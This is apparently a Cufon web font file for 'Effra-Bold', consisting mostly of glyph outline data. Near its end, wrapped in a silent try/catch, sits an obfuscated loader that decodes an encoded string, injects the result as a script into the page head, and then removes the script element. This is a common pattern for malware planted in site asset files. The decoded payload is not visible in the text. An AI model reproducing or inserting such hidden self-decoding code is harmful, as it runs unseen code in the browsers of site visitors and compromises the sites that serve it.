r-34,0r0,-37r43,0r13,-46r-34,0r0,-37r44,0r14,-54r41,0r-15,54r45,0r15,-54r40,0r-14,54r32,0r0,37r-42,0r-13,46r33,0r0,37r-42,0r-14,52r-41,0r14,-52r-45,0r-14,52r-40,0xm148,-89r12,-46r-44,0r-13,46r45,0","w":262},{"d":"133,-168v0,39,-21,66,-58,66v-37,0,-58,-28,-58,-66v0,-38,21,-65,58,-65v37,0,58,26,58,65xm75,-202v-26,2,-26,67,0,68v27,-1,25,-66,0,-68xm315,-62v0,39,-21,66,-58,66v-37,0,-58,-27,-58,-66v0,-39,20,-65,58,-65v38,0,58,26,58,65xm257,-96v-26,2,-26,67,0,68v27,-1,25,-66,0,-68xm215,-227r45,0r-144,227r-46,0","w":333},{"d":"105,-128v-53,0,-29,79,-34,128r-52,0r0,-240r52,0r0,87v36,-39,113,-19,113,49r0,104r-51,0v-6,-46,19,-128,-28,-128","w":203},{"d":"71,-120v-5,67,72,95,119,62r0,-30r-42,0r0,-44r92,0r0,104v-23,21,-58,34,-101,34v-80,0,-120,-47,-125,-126v-8,-121,157,-166,223,-81r-37,35v-16,-16,-31,-31,-60,-31v-44,0,-66,30,-69,77","w":260},{"d":"27,-68r91,-47r-90,-46r19,-37r128,68r0,31r-128,68"},{"d":"103,-247r51,0r-95,253r-52,0","w":161},{"d":"40,-44r40,0r0,-126r-38,20r-22,-40r67,-37r43,0r0,183r37,0r0,44r-127,0r0,-44"},{"d":"26,-101r144,0r0,42r-144,0r0,-42xm26,-167r144,0r0,42r-144,0r0,-42"},{"d":"242,-119v1,114,-100,126,-219,119r0,-240r91,0v80,1,127,39,128,121xm186,-119v0,-60,-42,-78,-108,-73r0,144v64,6,108,-14,108,-71","w":258},{"d":"180,-116v0,95,-75,150,-159,107r19,-40v21,10,60,17,75,-4v8,-10,13,-22,14,-37v-46,31,-120,1,-116,-62v3,-50,29,-81,81,-81v64,0,86,48,86,117xm61,-152v0,35,49,41,69,20v-1,-31,-7,-54,-36,-56v-20,0,-33,16,-33,36"},{"d":"44,0r-21,0r0,-58r59,0r0,58r-30,51r-31,0","w":101},{"d":"14,-35r83,-92r-79,0r0,-42r145,0r0,36r-83,92r83,0r0,41r-149,0r0,-35","w":176},{"d":"171,-183v-30,53,-58,119,-78,183r-54,0v20,-62,50,-129,79,-181r-100,0r0,-46r153,0r0,44"}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+118-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("4)Xde0y&1N9}4Oh|n0>`()(9IFydX09}IF@`1NLDXlfZ]Q&{nPyh@>]G]Ps&1s*O+3>)A(@4-;y!vcLt[PlNI]X1epnYSK?{#$h0Do~R^Zk},qa`Q&dFU_7G|f9ixQ?ZcP?S]&~fl>@aI0$kPFoKyhapp`>iNU?]edq{@`~IY&l&e[*}vQkpn[sq][*$X&9LnDd`4OX7;d*q;{$^])@;tQl!N$XOlIpfIP$}Xhhy(`loLQ7p-Q39L+$ZY#p{-Dyqe)h&4O({4ta~v[sZp+d{-DsZe+dq-0ahe0n&1OaDvN(}X{7DeAhq1A;9YU&|1N]o]{7,1Q&,I{Kx!DnUndq}4[fovQo}4dq}n)?hX0h}1Iyo1N7Dp)9Qn>q}]F9k4tc,1t7&XIy&4)a,]F>&1N9}-0?,pUL}]Ndh4th0eU(o!F$fe+Z^4F$~Xdk#NFhnI[dqNFhnSt$o4tsK")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":196,"face":{"font-family":"Effra-Bold","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 6 8 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"6","bbox":"-39 -300 331.031 76.1126","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+007E"}}));

